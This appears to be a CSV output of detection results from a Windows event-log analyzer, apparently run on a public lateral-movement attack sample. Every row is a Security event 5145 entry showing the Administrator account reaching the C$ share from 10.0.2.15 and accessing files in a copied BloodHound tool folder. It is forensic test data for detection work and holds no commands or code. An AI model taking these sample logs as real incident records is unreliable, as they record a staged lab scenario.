2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
